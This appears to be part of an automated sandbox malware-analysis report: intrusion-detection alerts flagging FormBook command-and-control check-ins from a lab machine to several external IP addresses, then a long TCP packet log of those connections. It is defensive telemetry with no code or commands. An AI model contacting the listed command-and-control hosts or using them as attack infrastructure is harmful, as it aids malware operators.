                                                                            2024-11-24T08:22:41.613298+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049915154.23.184.9580TCP
                                                                            2024-11-24T08:22:44.325497+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049923154.23.184.9580TCP
                                                                            2024-11-24T08:22:51.531098+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104993988.198.8.15080TCP
                                                                            2024-11-24T08:22:54.225589+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104994588.198.8.15080TCP
                                                                            2024-11-24T08:22:56.965486+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104995288.198.8.15080TCP
                                                                            2024-11-24T08:22:59.499518+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104995988.198.8.15080TCP
                                                                            2024-11-24T08:23:06.308685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049976172.67.162.3980TCP
                                                                            2024-11-24T08:23:08.933021+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049981172.67.162.3980TCP
                                                                            2024-11-24T08:23:11.660360+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049988172.67.162.3980TCP
                                                                            2024-11-24T08:23:14.280858+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049993172.67.162.3980TCP
                                                                            2024-11-24T08:23:21.347639+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105000246.253.5.22180TCP
                                                                            2024-11-24T08:23:24.019480+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105000346.253.5.22180TCP
                                                                            2024-11-24T08:23:26.691300+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105000446.253.5.22180TCP
                                                                            2024-11-24T08:23:49.750491+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105000546.253.5.22180TCP
                                                                            2024-11-24T08:23:56.661867+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050006107.167.84.4280TCP
                                                                            2024-11-24T08:23:59.293030+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050007107.167.84.4280TCP
                                                                            2024-11-24T08:24:01.939771+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050008107.167.84.4280TCP
                                                                            2024-11-24T08:24:04.614948+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050009107.167.84.4280TCP
                                                                            2024-11-24T08:24:11.589441+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050010209.74.77.10980TCP
                                                                            2024-11-24T08:24:14.320981+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050011209.74.77.10980TCP
                                                                            2024-11-24T08:24:16.977103+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050012209.74.77.10980TCP
                                                                            2024-11-24T08:24:19.667229+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050013209.74.77.10980TCP
                                                                            2024-11-24T08:24:26.656912+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050014199.59.243.22780TCP
                                                                            2024-11-24T08:24:29.332179+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050015199.59.243.22780TCP
                                                                            2024-11-24T08:24:31.942671+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050016199.59.243.22780TCP
                                                                            2024-11-24T08:24:34.685232+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050017199.59.243.22780TCP
                                                                            2024-11-24T08:24:41.562922+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105001874.208.236.15680TCP
                                                                            2024-11-24T08:24:44.480619+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105001974.208.236.15680TCP
                                                                            2024-11-24T08:24:47.408255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105002074.208.236.15680TCP
                                                                            2024-11-24T08:24:50.033643+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105002174.208.236.15680TCP
                                                                            2024-11-24T08:24:57.221884+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105002268.66.226.9280TCP
                                                                            2024-11-24T08:24:59.881848+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105002368.66.226.9280TCP
                                                                            2024-11-24T08:25:02.505834+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105002468.66.226.9280TCP
                                                                            2024-11-24T08:25:05.179600+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105002568.66.226.9280TCP
                                                                            2024-11-24T08:25:11.993303+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050026172.67.186.19280TCP
                                                                            2024-11-24T08:25:14.749889+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050027172.67.186.19280TCP
                                                                            2024-11-24T08:25:17.470725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050028172.67.186.19280TCP
                                                                            2024-11-24T08:25:20.159714+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050029172.67.186.19280TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 24, 2024 08:21:46.838848114 CET4978680192.168.2.1074.48.143.82
                                                                            Nov 24, 2024 08:21:46.958385944 CET804978674.48.143.82192.168.2.10
                                                                            Nov 24, 2024 08:21:46.958610058 CET4978680192.168.2.1074.48.143.82
                                                                            Nov 24, 2024 08:21:46.972889900 CET4978680192.168.2.1074.48.143.82
                                                                            Nov 24, 2024 08:21:47.092353106 CET804978674.48.143.82192.168.2.10
                                                                            Nov 24, 2024 08:21:48.178298950 CET804978674.48.143.82192.168.2.10
                                                                            Nov 24, 2024 08:21:48.178306103 CET804978674.48.143.82192.168.2.10
                                                                            Nov 24, 2024 08:21:48.178312063 CET804978674.48.143.82192.168.2.10
                                                                            Nov 24, 2024 08:21:48.178527117 CET4978680192.168.2.1074.48.143.82
                                                                            Nov 24, 2024 08:21:48.181785107 CET4978680192.168.2.1074.48.143.82
                                                                            Nov 24, 2024 08:21:48.301311016 CET804978674.48.143.82192.168.2.10
                                                                            Nov 24, 2024 08:22:04.025687933 CET4982780192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:04.145299911 CET804982798.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:04.145401001 CET4982780192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:04.163008928 CET4982780192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:04.282524109 CET804982798.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:05.420481920 CET804982798.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:05.420553923 CET804982798.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:05.420564890 CET804982798.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:05.420659065 CET4982780192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:05.675685883 CET4982780192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:06.695194006 CET4983380192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:06.814862013 CET804983398.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:06.815035105 CET4983380192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:06.836602926 CET4983380192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:06.956227064 CET804983398.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:08.089090109 CET804983398.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:08.089108944 CET804983398.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:08.089118004 CET804983398.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:08.089248896 CET4983380192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:08.347430944 CET4983380192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:09.366203070 CET4983980192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:09.485680103 CET804983998.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:09.485770941 CET4983980192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:09.500730038 CET4983980192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:09.620328903 CET804983998.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:09.620428085 CET804983998.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:10.819366932 CET804983998.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:10.819448948 CET804983998.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:10.819456100 CET804983998.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:10.819509029 CET4983980192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:11.003673077 CET4983980192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:12.022495031 CET4984680192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:12.141984940 CET804984698.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:12.142118931 CET4984680192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:12.151643038 CET4984680192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:12.271260023 CET804984698.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:13.321402073 CET804984698.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:13.321419954 CET804984698.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:13.321432114 CET804984698.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:13.321614027 CET4984680192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:13.331440926 CET4984680192.168.2.1098.124.224.17
                                                                            Nov 24, 2024 08:22:13.451128006 CET804984698.124.224.17192.168.2.10
                                                                            Nov 24, 2024 08:22:19.175301075 CET4986280192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:19.294763088 CET8049862103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:19.295100927 CET4986280192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:19.310132980 CET4986280192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:19.429650068 CET8049862103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:20.816133022 CET4986280192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:20.908935070 CET8049862103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:20.909002066 CET4986280192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:20.909039974 CET8049862103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:20.909085035 CET4986280192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:20.935642004 CET8049862103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:20.935710907 CET4986280192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:21.834830046 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:21.954451084 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:21.958323002 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:21.973274946 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:22.093053102 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.488075018 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:23.530997992 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.531101942 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:23.531137943 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.531199932 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:23.607619047 CET8049870103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:23.607745886 CET4987080192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.506669998 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.626420975 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:24.626538992 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.641484976 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:24.761002064 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:24.761034012 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.144464016 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:26.222321987 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.222352982 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.222461939 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:26.222461939 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:26.264008045 CET8049878103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:26.264168024 CET4987880192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.163033009 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.282658100 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:27.282742977 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.292931080 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:27.412417889 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:28.903328896 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:28.903395891 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:28.903616905 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:28.907432079 CET4988580192.168.2.10103.21.221.4
                                                                            Nov 24, 2024 08:22:29.026882887 CET8049885103.21.221.4192.168.2.10
                                                                            Nov 24, 2024 08:22:34.644455910 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:34.764087915 CET8049901154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:34.764367104 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:34.781830072 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:34.901549101 CET8049901154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:36.284996033 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:36.342447996 CET8049901154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:36.342510939 CET8049901154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:36.342617035 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:36.342617989 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:36.404664040 CET8049901154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:36.405188084 CET4990180192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:37.303797960 CET4990980192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:37.423357010 CET8049909154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:37.423443079 CET4990980192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:37.439878941 CET4990980192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:37.559659958 CET8049909154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:38.941250086 CET4990980192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:39.021914959 CET8049909154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:39.021995068 CET8049909154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:39.022037029 CET4990980192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:39.022087097 CET4990980192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:39.060914040 CET8049909154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:39.061029911 CET4990980192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:39.961184978 CET4991580192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:40.081052065 CET8049915154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:40.081161976 CET4991580192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:40.101125956 CET4991580192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:40.220772982 CET8049915154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:40.220803022 CET8049915154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:41.613297939 CET4991580192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:41.697002888 CET8049915154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:41.697011948 CET8049915154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:41.697072983 CET4991580192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:41.697103977 CET4991580192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:41.813225031 CET8049915154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:41.813303947 CET4991580192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:42.632354021 CET4992380192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:42.751959085 CET8049923154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:42.752131939 CET4992380192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:42.762362957 CET4992380192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:42.881885052 CET8049923154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:44.325042009 CET8049923154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:44.325160027 CET8049923154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:44.325496912 CET4992380192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:44.328414917 CET4992380192.168.2.10154.23.184.95
                                                                            Nov 24, 2024 08:22:44.447959900 CET8049923154.23.184.95192.168.2.10
                                                                            Nov 24, 2024 08:22:49.989382029 CET4993980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:50.109065056 CET804993988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:50.109155893 CET4993980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:50.128062010 CET4993980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:50.247706890 CET804993988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:51.531012058 CET804993988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:51.531039000 CET804993988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:51.531097889 CET4993980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:51.531117916 CET804993988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:51.531181097 CET4993980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:51.644360065 CET4993980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:52.663238049 CET4994580192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:52.782948017 CET804994588.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:52.783061028 CET4994580192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:52.798949003 CET4994580192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:52.918607950 CET804994588.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:54.225421906 CET804994588.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:54.225461960 CET804994588.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:54.225589037 CET4994580192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:54.225954056 CET804994588.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:54.226121902 CET4994580192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:54.302042961 CET4994580192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:55.319696903 CET4995280192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:55.440716028 CET804995288.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:55.440916061 CET4995280192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:55.458304882 CET4995280192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:55.577919006 CET804995288.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:55.577934980 CET804995288.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:56.965395927 CET804995288.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:56.965426922 CET804995288.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:56.965445042 CET804995288.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:56.965486050 CET4995280192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:56.965529919 CET4995280192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:56.972613096 CET4995280192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:57.994291067 CET4995980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:58.114082098 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:58.114209890 CET4995980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:58.126352072 CET4995980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:58.246208906 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499217033 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499258041 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499264956 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499475002 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499481916 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499488115 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499495029 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:22:59.499517918 CET4995980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:59.499612093 CET4995980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:59.504235983 CET4995980192.168.2.1088.198.8.150
                                                                            Nov 24, 2024 08:22:59.623764992 CET804995988.198.8.150192.168.2.10
                                                                            Nov 24, 2024 08:23:04.929173946 CET4997680192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:05.048742056 CET8049976172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:05.048849106 CET4997680192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:05.068605900 CET4997680192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:05.188142061 CET8049976172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:06.307883978 CET8049976172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:06.308625937 CET8049976172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:06.308685064 CET4997680192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:06.587681055 CET4997680192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:07.600857973 CET4998180192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:07.720665932 CET8049981172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:07.720765114 CET4998180192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:07.740407944 CET4998180192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:07.860116005 CET8049981172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:08.932344913 CET8049981172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:08.932934999 CET8049981172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:08.933021069 CET4998180192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:09.253777027 CET4998180192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:10.272582054 CET4998880192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:10.392179012 CET8049988172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:10.392260075 CET4998880192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:10.411919117 CET4998880192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:10.532011986 CET8049988172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:10.532043934 CET8049988172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:11.654504061 CET8049988172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:11.654958010 CET8049988172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:11.660360098 CET4998880192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:11.929148912 CET4998880192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:12.946362972 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:13.065924883 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:13.066062927 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:13.077807903 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:13.198277950 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280555010 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280603886 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280612946 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280656099 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280729055 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280735970 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280742884 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280750036 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280829906 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280838966 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.280858040 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:14.280858040 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:14.280858040 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:14.281136990 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:14.284806013 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:14.284854889 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:14.288727999 CET4999380192.168.2.10172.67.162.39
                                                                            Nov 24, 2024 08:23:14.408138037 CET8049993172.67.162.39192.168.2.10
                                                                            Nov 24, 2024 08:23:19.697911024 CET5000280192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:19.817588091 CET805000246.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:19.820667982 CET5000280192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:19.835752010 CET5000280192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:19.955359936 CET805000246.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:21.347639084 CET5000280192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:21.509253025 CET805000246.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:22.366975069 CET5000380192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:22.486587048 CET805000346.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:22.486669064 CET5000380192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:22.504612923 CET5000380192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:22.624078035 CET805000346.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:24.019479990 CET5000380192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:24.181217909 CET805000346.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:25.038986921 CET5000480192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:25.158952951 CET805000446.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:25.159029007 CET5000480192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:25.180537939 CET5000480192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:25.299983025 CET805000446.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:25.300067902 CET805000446.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:26.691299915 CET5000480192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:26.853270054 CET805000446.253.5.221192.168.2.10
                                                                            Nov 24, 2024 08:23:27.710407019 CET5000580192.168.2.1046.253.5.221
                                                                            Nov 24, 2024 08:23:27.831056118 CET805000546.253.5.221192.168.2.10
